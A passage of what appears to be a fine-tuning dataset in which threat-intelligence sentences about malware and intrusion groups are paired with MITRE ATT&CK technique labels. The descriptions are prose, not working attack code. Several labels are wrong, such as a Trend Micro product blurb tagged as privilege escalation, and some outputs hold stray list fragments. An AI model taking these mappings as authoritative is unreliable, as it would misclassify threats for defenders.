technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user’s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog" }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has used `mshta.exe` to execute malicious HTA files." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors have made some small changes, such as altering the variable names to avoid Yara detection" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account." }, { "role": "assistant", "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used WMI event filters to establish persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads." }, { "role": "assistant", "content": "T1027.009 - Embedded Payloads" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic uses the \"net time\" command to get the system time from the machine and collect the current date and time zone information." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike will break large data sets into smaller chunks for exfiltration." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Melcoz has the ability to download additional files to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CostaRicto has obtained open source tools to use in their operations." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has performed brute force attacks against administrator accounts." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses DLL side-loading to load malicious programs." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The shellcode retrieves an additional payload by connecting to the following C2 server using DNS: aaa.stage.14919005.www1.proslr3[.]com Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWizard can use `OpenRemoteServiceManager` to create a service." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti ransomware can spread itself by infecting other remote machines via network shared drives." }, { "role": "assistant", "content": "T1080 - Taint Shared Content" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes the netstat -ano command." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton modifies the tty_tickets line in the sudoers file." }, { "role": "assistant", "content": "T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used different versions of Mimikatz to obtain credentials." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g. These dynamic updates to Goldmax configuration data enable ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable/disable decoy network traffic feature, and update the number range used by its PRNG" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Invoke-TokenManipulation Exfiltration module can be used to locate and impersonate user logon tokens." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf uses custom base64 encoding to obfuscate HTTP traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can encrypt C2 traffic with AES." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy has used URL/Percent Encoding on data exfiltrated via HTTP POST requests." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate can use a Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has uploaded backdoored Docker images to Docker Hub." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Office documents, databases, archives, and multimedia files are the usual file types targeted by ransomware. It’s the same for this version of Erebus, which encrypts 433 file types. However, the ransomware appears to be coded mainly for targeting and encrypting web servers and data stored in them." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore can use AppleScript to inject malicious JavaScript into a browser." }, { "role": "assistant", "content": "T1059.002 - Command and Scripting Interpreter: AppleScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seasalt has a command to delete a specified file." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In some previous phishing email campaigns, attackers leveraged SendGrid to distribute the initial emails to hide the Google Drive links in the documents behind a SendGrid URL as a way to bypass traditional defences" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses port 443 for C2 communications." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OfficeScan’s Vulnerability Protection shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed. Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury has intercepted unencrypted private keys as well as private key pass-phrases." }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used port 8080 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution." }, { "role": "assistant", "content": "T1021.003 - Remote Services: Distributed Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRatReporter used several Windows API functions to gather information from the infected system." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "decodes Base64 strings and decrypts strings using a custom XOR algorithm." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can Base64-encode C2 commands." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and downloading additional files. The malware also features a destructive component, which can wipe the master boot record of an infected computer" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "First, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel by setting the following registry keys to the value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings The macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and PowerPoint by setting the following registry keys to a value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV   First Stage Payload The payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and decoy document" }, { "role": "assistant", "content": "T1553.002 - Code Signing', 'T1518.001 - Software Discovery: Security Software Discovery', 'T1005 - Data from Local System', 'T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1112 - Modify Registry', 'T1598.002 - Spearphishing Attachment', 'T1204 - User Execution', 'T1203 - Exploitation for Client Execution', 'T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The net time command can be used in to determine the local or remote system time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can use junk code to generate random activity to obscure malware behavior." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WinMM uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT has exfiltrated data over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has obfuscated scripts with the BatchEncryption tool." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The MainConnectionIo function checks if the Windows Firewall is enabled, sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function. If the communication fails, ZxShell disables the firewall by modifying the registry key" }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT uses HTTPS and HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information." }, { "role": "assistant", "content": "T1484.002 - Domain Trust Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can enumerate processes on a targeted system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses remote services such as VPN, Citrix, or OWA to persist in an environment." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole uses HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port." }, { "role": "assistant", "content": "T1205.001 - Port Knocking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can execute binaries through process hollowing." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin can use the command code \"do_vslist\" to send file names, size, and status to C2." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At face value, ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com. The first execution of ISMInjector starts by copying itself to %localappdata%\\srvBS.txt and enables persistent access to the system" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has used \"ZwQueueApcThread\" to inject itself into remote processes." }, { "role": "assistant", "content": "T1055.004 - Process Injection: Asynchronous Procedure Call" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Various implementations of communicate with C2 over HTTP, SMTP, and POP3." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key" }, { "role": "assistant", "content": "T1106 - Native API', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sometimes it is a high profile, legitimate site such as “diplomacy.pl”, hosting a ZIP archive" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Variants of Emissary have used rundll32.exe in Registry values added to establish persistence." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Analysis APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors executed commands through the installed web shell via Tor exit nodes." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL achieves persistence by adding itself to the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an 